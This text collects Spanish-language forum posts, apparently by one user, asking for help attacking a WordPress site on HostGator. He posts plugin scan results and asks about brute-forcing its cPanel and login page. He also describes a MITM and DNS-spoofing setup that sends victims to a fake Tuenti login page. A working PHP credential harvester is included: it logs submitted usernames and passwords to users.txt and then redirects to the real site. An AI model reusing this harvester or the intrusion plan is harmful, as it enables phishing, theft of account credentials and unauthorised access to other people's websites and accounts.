El wpscan no lo hice, hice el plecost que es el qe trae el backtrack5 R3 y me sale solo un plugin:

 [*] Search for installed plugins
[i] Plugin found: contact-form-7
    |_Latest version:  2.4.1
    |_ Installed version: 3.3.2 

Ya le he echo el nslookup y su host es hostgator. Es mejor no perder el tiempo con el reverse ??
En este caso que seria lo correcto, hacerle brute force al cpanel ??

Es obvio.. Gracias por todo. Acabo de encontrar el Panel de control, era You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login podria empezar a explotar por ahi.. ??

Perdona no era esa mi intencion, solo aprender. Si me dices que buscar y por donde te lo agradeceria.. Un Saludo.

Le he echo un scaner de plugin y solo le sale uno :

[*] Search for installed plugins

   
[i] Plugin found: contact-form-7
    |_Latest version:  2.4.1
    |_ Installed version: 3.3.2

Entonces es imposible ?? A parte de ese usuario ya tenia yo otro, pero no creo que se le pueda hacer brute force porque a los 4 intentos de conexion en /wp-login.php/ pone que no puedo introducir una contraseña hasta dentro de 30 minutos.

Voy a buscar lo de reverse dns y voy a pasarle un scaner de vulnerabilidades y plugins y comento.

Gracias!!;)

La version es la 3.5 y si que se puede ingresar al wp-includes. Y cuando intento acceder a algun php del includes me salta este error :

Fatal error: Call to undefined function add_action() in /home/boswell/public_html/*sitio*.com/wp-includes/theme.php on line 582

Por donde puedo seguir??, le he aplicado el plecost porque el wpscan no me viene en el Bactrack 5 R3 que yo tengo pero me da error.

Hola, llevo unos dias buscando vulenerabilidades a una web del tipo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login le pase un escaner de vulnerabilidades y me vomito 70 vulenerabilidades medias. Pero no se como explotarlas. Alguien me ayuda ?? Por donde puedo empezar..

Hola ya he abierto un post, sobre esto pero nadie fue capaz de aclararme la duda por eso te la comento aqui, puesto que es del mismo tema. Realizo un man in the middle, y acontinuacion un dns spoofing como tu has explicado. Yo en vez de redirigir a otro servidor, lo redirijo a un servidor propio montado con xampp. Entonces la victima cada vez que ingresa la contraseña se redirige a mi FAKE, mi problema es que de ahi no pasa pues siempre redirige al FAKE y se qeda ahi pillado y si de repente corto el envenenamiento eso tarda un rato, y tarde o temprano la victima se acaba por dar cuenta.

Todo esto realizado en una LAN, contralada por mi.

Alguna solucion para esto

Buenas amigos, haber he probado con la ip de tuenti, pero me ocurre lo mimo vuelve a redirigirme a la pagina fake que esta alojada en mi servidor apache, como seria modificar el php para que modificara su host, esque no tengo mucho conocimiento .PHP?? eso lo detectaria su pc.. Alguna solucion otra soluion ??

Gracias por vuestro tiempo!!

Voy a probar con la Ip de la pagina y digo los resultados, alguna solucion para hacer lo del host automaticamente ??

Hola necesito que alguien me ayude,  he realizado un MITM en mi LAN y lo he conseguido todo con exito, y luego realice un scam de tuenti para probar lo subi a un servidor Apache a traves de XAMPP y lleve a cabo un DNS SPOOFING, y esto tambien lo consigo con exito.
Mi problema es que cuando redirecciona a mi pagina e introduce el user y el pass, se supone que el .PHP recarga la pagina de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pero claro esta a su vez es redireccionada otra vez a mi pagina(fake), mi pregunta es que si hay alguna forma de que despues de obtener yo el password redireccione ya a la pagina de tuenti original. Yo lo que habia pensado es que en el codigo del .PHP pusiera que recargue la pagina You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login entonces así no rediccionaria el dns spoof a mi fake, pero mi sorpresa fue que no que vuelve a redireccionar a mi fake y de ahi no sale. Espero que hayan entendido mi problema. Aqui dejo el codigo del .PHP

<?php
$user=$_POST['email'];
$pass=$_POST['input_password'];

$fichero = fopen('users.txt', 'a');

fwrite($fichero,'Usuario:'.$user);

fwrite($fichero,chr(13).chr(10));
fwrite($fichero,'Password:'.$pass);
fwrite($fichero,chr(13).chr(10));
fwrite($fichero,'_______________________');
fwrite($fichero,chr(13).chr(10));
echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://www.tuenti.com/?m=login'>";
?> 

Alguien me ayuda Gracias!!:)